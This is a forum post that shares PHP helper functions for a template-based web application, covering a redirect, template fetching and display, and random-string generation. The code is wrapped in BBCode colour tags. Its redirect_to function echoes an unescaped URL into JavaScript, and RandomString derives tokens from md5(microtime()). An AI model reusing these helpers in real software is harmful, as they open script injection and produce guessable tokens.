function[/COLOR][COLOR="#0000BB"]escape_gpc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$in[/COLOR][COLOR="#007700"])

 {

 if ([/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]())

 {

[/COLOR][COLOR="#0000BB"]$in[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$in[/COLOR][COLOR="#007700"]);

 }

 return[/COLOR][COLOR="#0000BB"]$in[/COLOR][COLOR="#007700"];

 }



[/COLOR][COLOR="#FF8000"]//Redirect Using JAVASCRIPT

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]redirect_to[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]){

 echo[/COLOR][COLOR="#DD0000"]'

window.location = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"

'[/COLOR][COLOR="#007700"];

 exit([/COLOR][COLOR="#DD0000"]"Javascript is turned off, click here to go to requested page"[/COLOR][COLOR="#007700"]);

 }

[/COLOR][COLOR="#FF8000"]//Test function to return template file

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]Fetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$inside[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]FALSE[/COLOR][COLOR="#007700"])

 {

 if([/COLOR][COLOR="#0000BB"]$inside[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]fetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]);

 else

[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]fetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]LAYOUT[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]);

return[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#FF8000"]//Simple Template Displaying Function

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]Template[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$layout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]){

 global[/COLOR][COLOR="#0000BB"]$admin_area[/COLOR][COLOR="#007700"];

 if([/COLOR][COLOR="#0000BB"]$layout[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]LAYOUT[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]);

 else

[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'footer.html'[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$admin_area[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]TRUE[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]BASEDIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/includes/templatelib/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]);

 }

 if([/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'header.html'[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]BASEDIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/includes/templatelib/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]);

 }

}

function[/COLOR][COLOR="#0000BB"]Assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);

 }

[/COLOR][COLOR="#FF8000"]//Funtion of Random String

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]RandomString[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$length[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]microtime[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]$highest_startpoint[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]32[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$length[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$randomString[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$highest_startpoint[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$length[/COLOR][COLOR="#007700"]);

 return[/COLOR][COLOR="#0000BB"]$randomString[/COLOR][COLOR="#007700"];

}[/COLOR][/COLOR
 
Ответить с цитированием